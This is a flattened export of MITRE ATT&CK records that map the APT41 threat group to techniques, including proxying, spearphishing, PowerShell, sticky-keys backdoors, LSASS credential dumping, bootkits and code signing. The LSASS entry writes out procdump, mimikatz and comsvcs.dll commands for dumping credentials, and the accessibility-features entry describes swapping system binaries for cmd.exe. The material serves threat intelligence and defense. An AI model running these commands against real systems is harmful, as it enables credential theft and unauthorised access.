external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a tool called CLASSFON to covertly proxy network communications.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--cb0931f7-4d6c-4f21-95a8-fd9d74ba30e0
revoked : False
technique : Proxy
technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap.(Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1090
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--556f8dd8-50e0-4115-9815-c20bfc2b915a
revoked : False
technique : External Remote Services
technique_description : Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1133
matrix : mitre-attack
platform : ['Windows', 'Linux', 'Containers', 'macOS']
data_sources : ['Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Metadata', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--6160a359-35cc-4bbe-ac29-500f2751ed4b
revoked : False
technique : Spearphishing Attachment
technique_description : Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1566.001
matrix : mitre-attack
platform : ['macOS', 'Windows', 'Linux']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to masquerade their files as popular anti-virus software.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--285baef5-e948-4e56-a078-5e7f5e7404fd
|
||
revoked : False
|
||
technique : Match Legitimate Name or Location
|
||
technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
|
||
|
||
Adversaries may also use the same icon of the file they are trying to mimic.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1036.005
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'Containers']
|
||
data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims’ environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)
relationship_id : relationship--1aaecef9-d21a-420c-a6c0-53cca7a5e5d8
revoked : False
technique : PowerShell
technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged sticky keys to establish persistence.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--728c2a84-ac7d-4b17-a287-4c692d717065
revoked : False
technique : Accessibility Features
technique_description : Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times, and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later, as well as Windows Server 2003/R2 and later, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1546.008
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Windows Registry: Windows Registry Key Modification']
permissions_required : ['Administrator']
effective_permissions : ['SYSTEM']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used hashdump, [Mimikatz](https://attack.mitre.org/software/S0002), and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--cbbbc655-e5a7-40e9-be62-7f29727b9f0c
revoked : False
technique : LSASS Memory
technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)

Windows Security Support Provider (SSP) DLLs are loaded into the LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--e7bcc9e7-d373-4b1e-a664-886c4fc04bc5
revoked : False
technique : Remote Desktop Protocol
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1021.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Logon Session: Logon Session Metadata']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called WIDETONE to conduct port scans on specified subnets.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--883558d8-c445-45cf-a5cd-841fdf49f311
revoked : False
technique : Network Service Discovery
technique_description : Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to an on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use an mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1046
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Cloud Service: Cloud Service Enumeration']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) performed password brute-force attacks on the local admin account.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--79958036-a8bf-4808-af4f-f9f7a9cb6e7c
revoked : False
technique : Password Cracking
technique_description : Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, but this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A)

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The plaintext password recovered from a successfully cracked hash may be used to log into systems, resources, and services to which the account has access.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1110.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'Network']
data_sources : ['User Account: User Account Authentication', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--48132286-7b7d-42cf-956b-95c75eeff1e3
revoked : False
technique : Bootkit
technique_description : Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after the BIOS completes hardware initialization. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

The MBR passes control of the boot process to the VBR. As with the MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1542.003
matrix : mitre-attack
platform : ['Linux', 'Windows']
data_sources : ['Drive: Drive Modification']
permissions_required : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--1be07717-ad08-4364-9a58-b44a95a389a5
revoked : False
technique : Rootkit
technique_description : Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)

Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1014
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Drive: Drive Modification', 'Firmware: Firmware Modification', 'File: File Modification']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--3213e4e5-c3e4-4d51-8dce-929248f2882b
revoked : False
technique : Code Signing
technique_description : Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.
